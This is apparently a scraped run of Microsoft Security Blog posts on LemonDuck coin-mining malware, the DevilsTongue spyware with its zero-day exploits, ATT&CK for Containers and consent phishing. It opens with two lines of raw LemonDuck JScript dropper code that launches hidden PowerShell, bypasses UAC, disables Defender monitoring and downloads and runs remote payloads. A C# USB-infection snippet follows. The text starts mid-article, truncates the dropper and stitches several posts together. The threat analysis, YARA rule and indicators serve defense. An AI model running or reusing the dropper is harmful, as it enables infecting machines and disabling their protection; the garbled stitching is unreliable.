var cmd =new ActiveXObject("WScript.Shell");var cmdstr="cmd /c start /b notepad "+WScript.ScriptFullName+" & powershell -w hidden -c \"if([Environment]::OSVersion.version.Major -eq '10'){Set-ItemProperty -Path 'HKCU:\Environment' -Name 'windir' -Value 'cmd /c powershell -w hidden Set-MpPreference -DisableRealtimeMonitoring 1 & powershell -w hidden IEx(New-Object Net.WebClient).DownLoadString(''*%username%*%computername%''+[Environment]::OSVersion.version.Major) &::';sleep 1;schtasks /run /tn \\Microsoft\\Windows\\DiskCleanup\\SilentCleanup /I;Remove-ItemProperty -Path 'HKCU:\Environment' -Name 'windir' -Force}else{IEx(ne`w-obj`ect Net.WebC`lient).DownloadString('');bpu -method migwiz -Payload 'powershell -w hidden IEx(New-Object Net.WebClient).DownLoadString(''*%username%*%computername%''+[Environment]::OSVersion.version.Majo
//This File is broken.
var cmd =new ActiveXObject("WScript.Shell");var cmdstr="cmd /c start /b notepad "+WScript.ScriptFullName+" & powershell -w hidden IE`x(Ne`w-Obj`ect Net.WebC`lient).DownLoadString('http://t.z'+'*mail_js*%username%*%computername%*'+[Environment]::OSVersion.version.Major);bpu ('http://t.z'+'')";,0,1);
//This File is broken.


After the emails are sent, the inbox is cleaned to remove traces of these mails. This method of self-spreading is attempted on any affected device that has a mailbox, regardless of whether it is an Exchange server.

Other common methods of infection include movement within the compromised environment, as well as through USB and connected drives. These processes are often kicked off automatically and have occurred consistently throughout the entirety of LemonDuck’s operation.

These methods run as a series of C# scripts that gather available drives for infection. They also create a running list of drives that are already infected based on whether it finds the threat already installed. Once checked against the running list of infected drives, these scripts attempt to create a set of hidden files in the home directory, including a copy of readme.js. Any device that has been affected by the LemonDuck implants at any time could have had any number of drives attached to it that are compromised in this manner. This makes this behavior a possible entry vector for additional attacks.

DriveInfo[] drives = DriveInfo.GetDrives();
foreach (DriveInfo drive in drives)
if (blacklist.Contains(drive.Name))
{ continue;}
Console.WriteLine("Detect drive:"+drive.Name);
if (IsSupported(drive))
if (!File.Exists(drive + home + inf_data))
Console.WriteLine("Try to infect "+drive.Name);
if (CreateHomeDirectory(drive.Name) && Infect(drive.Name))
else {
Console.WriteLine(drive.Name+" already infected!");

Comprehensive protection against a wide-ranging malware operation

The cross-domain visibility and coordinated defense delivered by Microsoft 365 Defender is designed for the wide range and increasing sophistication of threats that LemonDuck exemplifies. Microsoft 365 Defender has AI-powered industry-leading protections that can stop multi-component threats like LemonDuck across domains and across platforms. Microsoft 365 Defender for Office 365 detects the malicious emails sent by the LemonDuck botnet to deliver malware payloads as well as spread the bot loader. Microsoft Defender for Endpoint detects and blocks LemonDuck implants, payloads, and malicious activity on Linux and Windows.

More importantly, Microsoft 365 Defender provides rich investigation tools that can expose detections of LemonDuck activity, including attempts to compromise and gain a foothold on the network, so security operations teams can efficiently and confidently respond to and resolve these attacks. Microsoft 365 Defender correlates cross-platform, cross-domain signals to paint the end-to-end attack chain, allowing organizations to see the full impact of an attack. We also published a threat analytics article on this threat. Microsoft 365 Defender customers can use this report to get important technical details, guidance for investigation, consolidated incidents, and steps to mitigate this threat in particular and modern cyberattacks in general.

In Part 2 of this blog series, we’ll share our in-depth technical analysis of the malicious actions that follow a LemonDuck infection. These include general, automatic behavior as well as human-initialized behavior. We will also provide guidance for investigating LemonDuck attacks, as well as mitigation recommendations for strengthening defenses against these attacks.


Microsoft 365 Defender Threat Intelligence Team

The post When coin miners evolve, Part 1: Exposing LemonDuck and LemonCat, modern mining malware infrastructure appeared first on Microsoft Security Blog.

Microsoft acquires CloudKnox Security to offer unified privileged access and cloud entitlement management

July 21st, 2021 No comments

Today on the Official Microsoft Blog, Microsoft announced the acquisition of CloudKnox Security, a leader in Cloud Infrastructure Entitlement Management (CIEM). CloudKnox offers complete visibility into privileged access. It helps organizations right-size permissions and consistently enforce least-privilege principles to reduce risk, and it employs continuous analytics to help prevent security breaches and ensure compliance. The acquisition further enables Microsoft Azure Active Directory (Azure AD) customers with granular visibility, continuous monitoring, and automated remediation for hybrid and multi-cloud permissions.

As the corporate network perimeter disappears, it’s crucial to establish a strong cloud identity foundation through a Zero Trust approach so you can protect business-critical systems, while improving business agility. We’re committed to making it easier to enforce appropriate, tailored privileges and other identity controls across multi-cloud environments, as organizations adapt to hybrid work, new risks, and business transformation.

Read more on Microsoft acquires CloudKnox Security to offer unified privileged access and cloud entitlement management.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.





The post Microsoft acquires CloudKnox Security to offer unified privileged access and cloud entitlement management appeared first on Microsoft Security Blog.

Categories: cybersecurity Tags:

The evolution of a matrix: How ATT&CK for Containers was built

July 21st, 2021 No comments

Note: The content of this post is being released jointly with the Center for Threat-Informed Defense. It is co-authored with Chris Ante and Matthew Bajzek. The Center post can be found here.

As containers become a major part of many organizations’ IT workloads, it becomes crucial to consider the unique security threats that target such environments when building security solutions. The first step in this process is understanding the relevant attack landscape.

The MITRE ATT&CK® team has received frequent questions from the community about if or when ATT&CK would include coverage for adversary behavior in containers. Previous iterations of ATT&CK have included references to containers (for example, Resource Hijacking) and some clearly container-relevant techniques (for example, Implant Internal Image), but the coverage was insufficient to provide network defenders a holistic view of how containers are being targeted in enterprise environments.

Addressing the need for a common framework for understanding container threats

Given clear community interest, inspiration from Microsoft’s work on the threat matrix for Kubernetes, and the publication of research from other teams, the Center for Threat-Informed Defense launched an investigation (sponsored by several Center members including Microsoft) that examined the viability of adding containers content to ATT&CK. The purpose of the Container Techniques project was to investigate adversarial behavior in containerization technologies and determine whether there was enough open-source intelligence to warrant the creation of an ATT&CK for Containers matrix, resulting in either new ATT&CK content or a report on the state of in-the-wild Container-based tactics, techniques, and procedures (TTPs). The Center’s research team quickly concluded that there was more than enough open-source intelligence to justify technique development, ultimately resulting in the new matrix.

As of the ATT&CK v9 release, the ATT&CK for Containers matrix is officially available. More details about the Containers matrix can be found in MITRE-Engenuity’s announcement blog. Some highlights of the new matrix include related software entries, procedure examples to help network defenders better understand new container-centric techniques, data sources to match the recent ATT&CK data sources refactor, and many others.

A matrix of attack techniques related to containerization technologies, organized by stages of an attack.

Figure 1. ATT&CK for Containers matrix.

Evolving the threat matrix

MITRE ATT&CK has become the common vocabulary for describing real-world adversary behavior. ATT&CK offers organizations a method to measure their defenses against threats that impact their environment and identify possible gaps. With ATT&CK’s approach of methodically outlining the possible threats, Microsoft built the threat matrix for Kubernetes, which was one of the first attempts to systematically map the attack surface of Kubernetes. An updated version of the matrix was released earlier in 2021.

A matrix of attack techniques specific to Kubernetes, organized by stages of an attack.

Figure 2: Threat matrix for Kubernetes.

Microsoft took part in the Center’s project and contributed knowledge that the company gained in the field of container security. Microsoft’s unparalleled visibility into threats helps to identify real-world attacks against containerized workloads and provide information about tactics and techniques used in those attacks. One example of such an attack is a cryptocurrency mining campaign that targeted Kubernetes. In this incident, Microsoft saw evidence of the following techniques from the Microsoft threat matrix:

  • Exposed sensitive interfaces
  • New container
  • Pod/container name similarity
  • List Kubernetes secrets
  • Access Kubernetes API server
  • Resource Hijacking

The techniques that went into ATT&CK for Containers are different from those in the Microsoft threat matrix. As described in a blog post by the Center, it was preferable to use an existing ATT&CK technique rather than create a new one when possible. Therefore, several techniques from the threat matrix were mapped into existing Enterprise ATT&CK techniques. For example, in the techniques listed above, “Exposed sensitive interfaces” from the threat matrix is equivalent to ATT&CK’s “External Remote Services.”

The Center’s process for leveraging Microsoft’s Kubernetes threat matrix was as follows:

  • Cross-referencing threat intelligence with the techniques in the Kubernetes threat matrix.
  • Determining whether techniques with sufficient intelligence backing were already covered by existing Enterprise ATT&CK techniques, or whether they justified the creation of one or more new techniques or sub-techniques.

Considering Microsoft’s tactics mapping for specific techniques and how they fit within ATT&CK’s Enterprise, Cloud, and Containers matrix scoping, as in the case of multiple forms of “lateral movement,” the Center instead identified pivots from one ATT&CK platform matrix to another (for example, Containers to Cloud).

The following are examples of techniques from Microsoft’s matrix that were re-scoped to fit into existing Enterprise ATT&CK techniques:

Microsoft threat matrix   MITRE ATT&CK
Application vulnerability –> Exploit Public-Facing Application
Exposed sensitive interfaces –> External Remote Services
Clear container logs –> Indicator Removal on Host
Pod/container name similarity –> Masquerading: Match Legitimate Name or Location
Access Kubelet API –> Network Service Scanning

Meanwhile, the following are examples of techniques from the Microsoft threat matrix that were re-scoped based on the Center’s platform decisions and additional open-source intelligence, with additional detail on each technique/sub-technique available in its description within ATT&CK for Containers:

Microsoft threat matrix   MITRE ATT&CK
Exec into container + bash/cmd inside container –> Container Administration Command
New container –> Deploy Container
Kubernetes CronJob –> Scheduled Task/Job: Container Orchestration Job
HostPath mount + Writable volume mounts on the host –> Escape to Host

Not all the techniques and tactics that appear in the Microsoft threat matrix went into the new ATT&CK matrix. ATT&CK focuses on real-world techniques that are seen in the wild. In contrast, many of the techniques in the threat matrix were observed during research work and not necessarily as part of an active attack. For example, “CoreDNS poisoning” from the updated matrix is a possible attack vector but hasn’t been seen in the wild yet.

ATT&CK is dynamic

ATT&CK for Containers is by no means finished, and we look forward to future additions based on new intelligence and further community contributions. Before the public release of ATT&CK for Containers, Microsoft released an updated version of the threat matrix for Kubernetes, which speaks to the fast-paced evolution of this technology space and the need to keep up with new adversary behaviors.

The next step for the ATT&CK team is to assess the new content in Microsoft’s matrix and consider it for potential future inclusion in ATT&CK based on the factors described above. Microsoft and the ATT&CK team will continue to collaborate to ensure that container techniques coverage in ATT&CK is up-to-date and can continue to serve the need of the community.

With the completion of this Center project, ATT&CK for Containers will be maintained by the ATT&CK team, who would love your continuous feedback and contribution! Let the team know what you think, what could be improved, and most importantly what you see adversaries doing in the wild related to containers. Feel free to send an email at any time to If you have ideas for other research and development projects that the Center should consider, please send an email to

Learn more

To learn how Microsoft can help you protect containers and relevant technologies today, read about Microsoft Defender for Endpoint and Azure Defender.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post The evolution of a matrix: How ATT&CK for Containers was built appeared first on Microsoft Security Blog.

Introducing Bounty Awards for Teams Mobile Applications Security Research

July 19th, 2021 No comments

We are pleased to announce the addition of Microsoft Teams mobile applications to the Microsoft Applications Bounty Program. Through the expanded program we welcome researchers from across the globe to seek out and disclose any high impact security vulnerabilities they may find in Teams mobile applications to help secure customers. Rewards up to $30,000 USD …

Introducing Bounty Awards for Teams Mobile Applications Security Research Read More »

Announcing the Top MSRC 2021 Q2 Security Researchers – Congratulations!

July 15th, 2021 No comments

We’re excited to announce the top contributing researchers for the 2021 Second Quarter (Q2)! Congratulations to all the researchers recognized in this quarter’s leaderboard and thank you to everyone who continues to help secure our customers and the ecosystem. The top three researchers of the 2021 Q2 Security Researcher Leaderboard are: Yuki Chen (765 points), …

Announcing the Top MSRC 2021 Q2 Security Researchers – Congratulations! Read More »

Protecting customers from a private-sector offensive actor using 0-day exploits and DevilsTongue malware

July 15th, 2021 No comments

The Microsoft Threat Intelligence Center (MSTIC) alongside the Microsoft Security Response Center (MSRC) has uncovered a private-sector offensive actor, or PSOA, that we are calling SOURGUM in possession of now-patched, Windows 0-day exploits (CVE-2021-31979 and CVE-2021-33771).

Private-sector offensive actors are private companies that manufacture and sell cyberweapons in hacking-as-a-service packages, often to government agencies around the world, to hack into their targets’ computers, phones, network infrastructure, and other devices. With these hacking packages, usually the government agencies choose the targets and run the actual operations themselves. The tools, tactics, and procedures used by these companies only adds to the complexity, scale, and sophistication of attacks. We take these threats seriously and have moved swiftly alongside our partners to build in the latest protections for our customers.

MSTIC believes SOURGUM is an Israel-based private-sector offensive actor. We would like to thank the Citizen Lab, at the University of Toronto’s Munk School, for sharing the sample of malware that initiated this work and their collaboration during the investigation. In their blog, Citizen Lab asserts with high confidence that SOURGUM is an Israeli company commonly known as Candiru. Third-party reports indicate Candiru produces “hacking tools [that] are used to break into computers and servers”.  

As we shared in the Microsoft on the Issues blog, Microsoft and Citizen Lab have worked together to disable the malware being used by SOURGUM that targeted more than 100 victims around the world including politicians, human rights activists, journalists, academics, embassy workers, and political dissidents. To limit these attacks, Microsoft has created and built protections into our products against this unique malware, which we are calling DevilsTongue. We have shared these protections with the security community so that we can collectively address and mitigate this threat. We have also issued a software update that will protect Windows customers from the associated exploits that the actor used to help deliver its highly sophisticated malware.

SOURGUM victimology

Media reports (1, 2, 3) indicate that PSOAs often sell Windows exploits and malware in hacking-as-a-service packages to government agencies. Agencies in Uzbekistan, United Arab Emirates, and Saudi Arabia are among the list of Candiru’s alleged previous customers. These agencies, then, likely choose whom to target and run the cyberoperations themselves.

Microsoft has identified over 100 victims of SOURGUM’s malware, and these victims are as geographically diverse as would be expected when varied government agencies are believed to be selecting the targets. Approximately half of the victims were found in Palestinian Authority, with most of the remaining victims located in Israel, Iran, Lebanon, Yemen, Spain (Catalonia), United Kingdom, Turkey, Armenia, and Singapore. To be clear, the identification of victims of the malware in a country doesn’t necessarily mean that an agency in that country is a SOURGUM customer, as international targeting is common.

Any Microsoft 365 Defender and Microsoft Defender for Endpoint alerts containing detection names for the DevilsTongue malware name are signs of compromise by SOURGUM’s malware. We have included a comprehensive list of detection names below for customers to perform additional hunting in their environments.


SOURGUM appears to use a chain of browser and Windows exploits, including 0-days, to install malware on victim boxes. Browser exploits appear to be served via single-use URLs sent to targets on messaging applications such as WhatsApp.

During the investigation, Microsoft discovered two Windows 0-day exploits for vulnerabilities tracked as CVE-2021-31979 and CVE-2021-33771, both of which have been fixed in the July 2021 security updates. These vulnerabilities allow privilege escalation, giving an attacker the ability to escape browser sandboxes and gain kernel code execution. If customers have taken the July 2021 security update, they are protected from these exploits.

CVE-2021-31979 fixes an integer overflow within Windows NT-based operating system (NTOS). This overflow results in an incorrect buffer size being calculated, which is then used to allocate a buffer in the kernel pool. A buffer overflow subsequently occurs while copying memory to the smaller-than-expected destination buffer. This vulnerability can be leveraged to corrupt an object in an adjacent memory allocation. Using APIs from user mode, the kernel pool memory layout can be groomed with controlled allocations, resulting in an object being placed in the adjacent memory location. Once corrupted by the buffer overflow, this object can be turned into a user mode to kernel mode read/write primitive. With these primitives in place, an attacker can then elevate their privileges.

CVE-2021-33771 addresses a race condition within NTOS resulting in the use-after-free of a kernel object. By using multiple racing threads, the kernel object can be freed, and the freed memory reclaimed by a controllable object. Like the previous vulnerability, the kernel pool memory can be sprayed with allocations using user mode APIs with the hopes of landing an object allocation within the recently freed memory. If successful, the controllable object can be used to form a user mode to kernel mode read/write primitive and elevate privileges.

DevilsTongue malware overview

DevilsTongue is a complex modular multi-threaded piece of malware written in C and C++ with several novel capabilities. Analysis is still on-going for some components and capabilities, but we’re sharing our present understanding of the malware so defenders can use this intelligence to protect networks and so other researchers can build on our analysis.

For files on disk, PDB paths and PE timestamps are scrubbed, strings and configs are encrypted, and each file has a unique hash. The main functionality resides in DLLs that are encrypted on disk and only decrypted in memory, making detection more difficult. Configuration and tasking data is separate from the malware, which makes analysis harder.  DevilsTongue has both user mode and kernel mode capabilities. There are several novel detection evasion mechanisms built in. All these features are evidence that SOURGUM developers are very professional, have extensive experience writing Windows malware, and have a good understanding of operational security.

When the malware is installed, a first-stage ‘hijack’ malware DLL is dropped in a subfolder of C:\Windows\system32\IME\; the folders and names of the hijack DLLs blend with legitimate names in the \IME\ directories. Encrypted second-stage malware and config files are dropped into subfolders of C:\Windows\system32\config\ with a .dat file extension. A third-party legitimate, signed driver physmem.sys is dropped to the system32 folder. A file called WimBootConfigurations.ini is also dropped; this file has the command for following the COM hijack. Finally, the malware adds the hijack DLL to a COM class registry key, overwriting the legitimate COM DLL path that was there, achieving persistence via COM hijacking.

From the COM hijacking, the DevilsTongue first-stage hijack DLL gets loaded into a svchost.exe process to run with SYSTEM permissions. The COM hijacking technique means that the original DLL that was in the COM registry key isn’t loaded. This can break system functionality and trigger an investigation that could lead to the discovery of the malware, but DevilsTongue uses an interesting technique to avoid this. In its DllMain function it calls LoadLibrary on the original COM DLL so it is correctly loaded into the process. DevilsTongue then searches the call stack to find the return address of LoadLibraryExW (i.e., the function currently loading the DevilsTongue DLL),  which would usually return the base address of the DevilsTongue DLL.

Once the LoadLibraryExW return address has been found, DevilsTongue allocates a small buffer with shellcode that puts the COM DLL’s base address (imecfmup.7FFE49060000 in Figure 1) into the rax register and then jumps to the original return address of LoadLibraryExW (svchost.7FF78E903BFB in Figures 1 and 2). In Figure 1 the COM DLL is named imecfmup rather than a legitimate COM DLL name because some DevilsTongue samples copied the COM DLL to another location and renamed it.

Figure 1. DevilsTongue return address modification shellcode

DevilsTongue then swaps the original LoadLibraryExW return address on the stack with the address of the shellcode so that when LoadLibraryExW returns it does so into the shellcode (Figures 2 and 3). The shellcode replaces the DevilsTongue base address in rax with the COM DLL’s base address, making it look like LoadLibraryExW has returned the COM DLL’s address. The svchost.exe host process now uses the returned COM DLL base address as it usually would.

Figure 2. Call stack before stack swap, LoadLibraryExW in kernelbase returning to svchost.exe (0x7FF78E903BFB)

Figure 3. Call stack after stack swap, LoadLibraryExW in kernelbase returning to the shellcode address (0x156C51E0000 from Figure 1)

This technique ensures that the DevilsTongue DLL is loaded by the svchost.exe process, giving the malware persistence, but that the legitimate COM DLL is also loaded correctly so there’s no noticeable change in functionality on the victim’s systems.

After this, the hijack DLL then decrypts and loads a second-stage malware DLL from one of the encrypted .dat files. The second-stage malware decrypts another .dat file that contains multiple helper DLLs that it relies on for functionality.

DevilsTongue has standard malware capabilities, including file collection, registry querying, running WMI commands, and querying SQLite databases. It’s capable of stealing victim credentials from both LSASS and from browsers, such as Chrome and Firefox. It also has dedicated functionality to decrypt and exfiltrate conversations from the Signal messaging app.

It can retrieve cookies from a variety of web browsers. These stolen cookies can later be used by the attacker to sign in as the victim to websites to enable further information gathering. Cookies can be collected from these paths (* is a wildcard to match any folders):

  • %LOCALAPPDATA%\Chromium\User Data\*\Cookies
  • %LOCALAPPDATA%\Google\Chrome\User Data\*\Cookies
  • %LOCALAPPDATA%\Microsoft\Windows\INetCookies
  • %LOCALAPPDATA%\Packages\*\AC\*\MicrosoftEdge\Cookies
  • %LOCALAPPDATA%\UCBrowser\User Data_i18n\*\Cookies.9
  • %LOCALAPPDATA%\Yandex\YandexBrowser\User Data\*\Cookies
  • %APPDATA%\Apple Computer\Safari\Cookies\Cookies.binarycookies
  • %APPDATA%\Microsoft\Windows\Cookies
  • %APPDATA%\Mozilla\Firefox\Profiles\*\cookies.sqlite
  • %APPDATA%\Opera Software\Opera Stable\Cookies

Interestingly, DevilsTongue seems able to use cookies directly from the victim’s computer on websites such as Facebook, Twitter, Gmail, Yahoo,, Odnoklassniki, and Vkontakte to collect information, read the victim’s messages, and retrieve photos. DevilsTongue can also send messages as the victim on some of these websites, appearing to any recipient that the victim had sent these messages. The capability to send messages could be weaponized to send malicious links to more victims.

Alongside DevilsTongue a third-party signed driver is dropped to C:\Windows\system32\physmem.sys. The driver’s description is “Physical Memory Access Driver,” and it appears to offer a “by-design” kernel read/write capability. This appears to be abused by DevilsTongue to proxy certain API calls via the kernel to hinder detection, including the capability to have some of the calls appear from other processes. Functions capable of being proxied include CreateProcessW, VirtualAllocEx, VirtualProtectEx, WriteProcessMemory, ReadProcessMemory, CreateFileW and RegSetKeyValueW.

Prevention and detection

To prevent compromise from browser exploits, it’s recommended to use an isolated environment, such as a virtual machine, when opening links from untrusted parties. Using a modern version of Windows 10 with virtualization-based protections, such as Credential Guard, prevents DevilsTongue’s LSASS credential-stealing capabilities. Enabling the attack surface reduction rule “Block abuse of exploited vulnerable signed drivers” in Microsoft Defender for Endpoint blocks the driver that DevilsTongue uses. Network protection blocks known SOURGUM domains.

Detection opportunities

This section is intended to serve as a non-exhaustive guide to help customers and peers in the cybersecurity industry to detect the DevilsTongue malware. We’re providing this guidance with the expectation that SOURGUM will likely change the characteristics we identify for detection in their next iteration of the malware. Given the actor’s level of sophistication, however, we believe that outcome would likely occur irrespective of our public guidance.

File locations

The hijack DLLs are in subfolders of \system32\ime\ with names starting with ‘im’. However, they are blended with legitimate DLLs in those folders. To distinguish between the malicious and benign, the legitimate DLLs are signed (on Windows 10) whereas the DevilsTongue files aren’t. Example paths:

  • C:\Windows\System32\IME\IMEJP\imjpueact.dll
  • C:\Windows\system32\ime\IMETC\IMTCPROT.DLL
  • C:\Windows\system32\ime\SHARED\imecpmeid.dll

 The DevilsTongue configuration files, which are AES-encrypted, are in subfolders of C:\Windows\system32\config\ and have a .dat extension. The exact paths are victim-specific, although some folder names are common across victims. As the files are AES-encrypted, any files whose size mod 16 is 0 can be considered as a possible malware config file. The config files are always in new folders, not the legitimate existing folders (e.g., on Windows 10, never in \Journal, \systemprofile, \TxR etc.). Example paths:

  • C:\Windows\system32\config\spp\ServiceState\Recovery\pac.dat
  • C:\Windows\system32\config\cy-GB\Setup\SKB\InputMethod\TupTask.dat
  • C:\Windows\system32\config\config\startwus.dat

Commonly reused folder names in the config file paths:

  • spp
  • SKB
  • curv
  • networklist
  • Licenses
  • InputMethod
  • Recovery

The .ini reg file has the unique name WimBootConfigurations.ini and is in a subfolder of system32\ime\. Example paths:

  • C:\Windows\system32\ime\SHARED\WimBootConfigurations.ini
  • C:\Windows\system32\ime\IMEJP\WimBootConfigurations.ini
  • C:\Windows\system32\ime\IMETC\WimBootConfigurations.ini

The Physmem driver is dropped into system32:

  • C:\Windows\system32\physmem.sys


The two COM keys that have been observed being hijacked for persistence are listed below with their default clean values. If their default value DLL is in the \system32\ime\ folder, the DLL is likely DevilsTongue.

  • HKLM\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32 = %systemroot%\system32\wbem\wmiutils.dll (clean default value)
  • HKLM\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\InProcServer32 = %systemroot%\system32\wbem\wbemsvc.dll (clean default value)

File content and characteristics

This Yara rule can be used to find the DevilsTongue hijack DLL:

import "pe"
rule DevilsTongue_HijackDll
description = "Detects SOURGUM's DevilsTongue hijack DLL"
author = "Microsoft Threat Intelligence Center (MSTIC)"
date = "2021-07-15"
$str1 = "windows.old\\windows" wide
$str2 = "NtQueryInformationThread"
$str3 = "dbgHelp.dll" wide
$str4 = "StackWalk64"
$str5 = "ConvertSidToStringSidW"
$str6 = "S-1-5-18" wide
$str7 = "SMNew.dll" // DLL original name
// Call check in stack manipulation
// B8 FF 15 00 00   mov     eax, 15FFh
// 66 39 41 FA      cmp     [rcx-6], ax
// 74 06            jz      short loc_1800042B9
// 80 79 FB E8      cmp     byte ptr [rcx-5], 0E8h ; 'è'
$code1 = {B8 FF 15 00 00 66 39 41 FA 74 06 80 79 FB E8}
// PRNG to generate number of times to sleep 1s before exiting
// 44 8B C0 mov r8d, eax
// B8 B5 81 4E 1B mov eax, 1B4E81B5h
// 41 F7 E8 imul r8d
// C1 FA 05 sar edx, 5
// 8B CA    mov ecx, edx
// C1 E9 1F shr ecx, 1Fh
// 03 D1    add edx, ecx
// 69 CA 2C 01 00 00 imul ecx, edx, 12Ch
// 44 2B C1 sub r8d, ecx
// 45 85 C0 test r8d, r8d
// 7E 19    jle  short loc_1800014D0
$code2 = {44 8B C0 B8 B5 81 4E 1B 41 F7 E8 C1 FA 05 8B CA C1 E9 1F 03 D1 69 CA 2C 01 00 00 44 2B C1 45 85 C0 7E 19}
filesize < 800KB and
uint16(0) == 0x5A4D and
(pe.characteristics & pe.DLL) and
4 of them or
($code1 and $code2) or
(pe.imphash() == "9a964e810949704ff7b4a393d9adda60")

Microsoft Defender Antivirus detections

Microsoft Defender Antivirus detects DevilsTongue malware with the following detections:

  • Trojan:Win32/DevilsTongue.A!dha
  • Trojan:Win32/DevilsTongue.B!dha
  • Trojan:Script/DevilsTongueIni.A!dha
  • VirTool:Win32/DevilsTongueConfig.A!dha
  • HackTool:Win32/DevilsTongueDriver.A!dha

Microsoft Defender for Endpoint alerts

Alerts with the following titles in the security center can indicate DevilsTongue malware activity on your network:

  • COM Hijacking
  • Possible theft of sensitive web browser information
  • Stolen SSO cookies 

Azure Sentinel query

To locate possible SOURGUM activity using Azure Sentinel, customers can find a Sentinel query containing these indicators in this GitHub repository.

Indicators of compromise (IOCs)

No malware hashes are being shared because DevilsTongue files, except for the third part driver below, all have unique hashes, and therefore, are not a useful indicator of compromise.

Physmem driver

Note that this driver may be used legitimately, but if it’s seen on path C:\Windows\system32\physmem.sys then it is a high-confidence indicator of DevilsTongue activity. The hashes below are provided for the one driver observed in use.

  • MD5: a0e2223868b6133c5712ba5ed20c3e8a
  • SHA-1: 17614fdee3b89272e99758983b99111cbb1b312c
  • SHA-256: c299063e3eae8ddc15839767e83b9808fd43418dc5a1af7e4f44b97ba53fbd3d


  • noc-service-streamer[.]com
  • fbcdnads[.]live
  • hilocake[.]info
  • backxercise[.]com
  • winmslaf[.]xyz
  • service-deamon[.]com
  • online-affiliate-mon[.]com
  • codeingasmylife[.]com
  • kenoratravels[.]com
  • weathercheck[.]digital
  • colorpallatess[.]com
  • library-update[.]com
  • online-source-validate[.]com
  • grayhornet[.]com
  • johnshopkin[.]net
  • eulenformacion[.]com
  • pochtarossiy[.]info

The post Protecting customers from a private-sector offensive actor using 0-day exploits and DevilsTongue malware appeared first on Microsoft Security Blog.

Microsoft delivers comprehensive solution to battle rise in consent phishing emails

July 14th, 2021 No comments

Microsoft threat analysts are tracking a continued increase in consent phishing emails, also called illicit consent grants, that abuse OAuth request links in an attempt to trick recipients into granting attacker-owned apps permissions to access sensitive data.

This blog offers a look into the current state of consent phishing emails as an initial attack vector and what security administrators can do to prevent, detect, and respond to these threats using advanced solutions like Microsoft Defender for Office 365. Consent phishing attacks aim to trick users into granting permissions to malicious cloud apps in order to gain access to user’s legitimate cloud services. The consent screen displays all permissions the app receives; and because the cloud services are legitimate, unsuspecting users accept the terms or hit ‘enter,’ which grants the malicious app those requested permissions.

Consent phishing attacks are a specialized form of phishing, so they require a comprehensive, multi-layer defense. It’s important for system administrators to gain visibility and control over apps and the permissions these apps have in their environment. User consent settings with consent policies in Azure Active Directory enable administrators to manage when end users can grant consent to apps. A new app governance add-on feature in Microsoft Cloud App Security provides organizations the visibility to enable them to quickly identify when an app exhibits anomalous behavior.

Microsoft has previously warned against these application-based attacks as many organizations shifted to remote work force at the onset of the COVID-19 pandemic. Microsoft’s Digital Crimes Unit (DCU) has in the past also taken steps to disrupt cybercriminal infrastructure used for a particular consent phishing campaign.

The state of consent phishing attacks

Consent phishing attacks abuse legitimate cloud service providers, including Microsoft, Google, and Facebook, that use OAuth 2.0 authorization—a widely used industry protocol that allows third-party apps to access a user’s account and perform actions on their behalf.

The goal of these attacks is to trick unsuspecting users into granting permissions (consent) to malicious attacker-owned applications. This is different from a typical credential harvesting attack, where an attacker looking to steal credentials would craft a convincing email, host a fake landing page, and expect users to fall for the lure. If the attempt is successful, user credentials are then passed on to the attacker.

In a consent phishing attack, the user sign-in takes place at a legitimate identity provider, rather than a fake sign-in page, in an attempt to trick users into granting permissions to malicious attacker-controlled applications. Attackers use the obtained access tokens to retrieve users’ account data from the API resource, without any further action by the user. Targeted users who grant the permissions allow attackers to make API calls on their behalf through the attacker-controlled app. Depending on the permissions granted, the access token can also be used to access other data, such as files, contacts, and other profile details.

Microsoft Defender for Office 365 data shows an increasing use of this technique in recent months.

Figure 1. OAuth phishing URL trend from October 2020

In most cases, consent phishing attacks do not involve password theft, as access tokens don’t require knowledge of the user’s password, yet attackers are still able to steal confidential data and other sensitive information. Attackers can then maintain persistence in the target organization and perform reconnaissance to further compromise the network.

A typical consent phishing attack follows this attack chain:

Figure 2. Consent phishing attack flow

Attackers typically configure apps so that they appear trustworthy, registering them using names like “Enable4Calc”, “SettingsEnabler”, or “Settings4Enabler,” which resemble legitimate business productivity app integrations. Attackers then distribute OAuth 2.0 URLs via conventional email-based phishing attacks, among other possible techniques.

Clicking the URL triggers an authentic consent prompt, asking users to grant the malicious app permissions. Other cloud providers, such as Google, Facebook, or Twitter, display consent prompts or dialog boxes that request for users’ permissions on behalf of third-party apps. The permissions requested vary depending on the app.

Figure 3. OAuth apps gain permission by displaying a “Permissions requested” dialog that shows what permissions the third-party is requesting

When users click “accept” or “allow”, the app obtains an authorization code that it redeems for an access token. This access token is then used to make API calls on behalf of the user, giving attackers access to the user’s email, forwarding rules, files, contacts, and other sensitive data and resources.

Consent phishing campaign: A case study

A recent consent phishing attack we tracked employed social engineering techniques to craft an email that impersonates a business growth solutions company. The message falsely claims to instruct users to review and sign a document, signaling a sense of urgency for the user—a tactic that is apparent in most phishing emails.

Figure 4. Sample email campaign with a Review Doc(s) & Sign link pointing to an OAuth URL

There are several phishing techniques in this email campaign: brand impersonation, personalized email text specific to the recipient or organization, and a recognizable sense of urgency as a social engineering lure.

What differentiates this attack from others is how the OAuth URL serves malicious content. To the email recipient, the “Review Doc(s) & Sign” OAuth URL appears legitimate, while URL is formatted with the identity provider URL as well.

The pattern we observed in this instance displays the the OAuth URL as “” Other providers, such as Google, also format OAuth URLs in a similar manner.

Figure 5. Observed patterns in OAuth URLs pointing to attacker’s domain

Given the recent trend in OAuth abuse, we encourage organizations to look into and prevent this critical threat, beyond what traditional security measures offer.

How Microsoft delivers comprehensive, coordinated defense against consent phishing

The sophisticated and dynamic threat landscape exemplified by consent phishing attacks demonstrates the importance of employing a Zero Trust security model with a multi-layer defense architecture.

Microsoft 365 Defender provides comprehensive protection against consent phishing by coordinating defense across domains using multiple solutions: Microsoft Defender for Office 365, Microsoft Cloud App Security, and Azure Active Directory.

Prevent consent for illegitimate apps with Azure AD user consent settings

The Microsoft identity platform helps prevent consent phishing in a few ways.

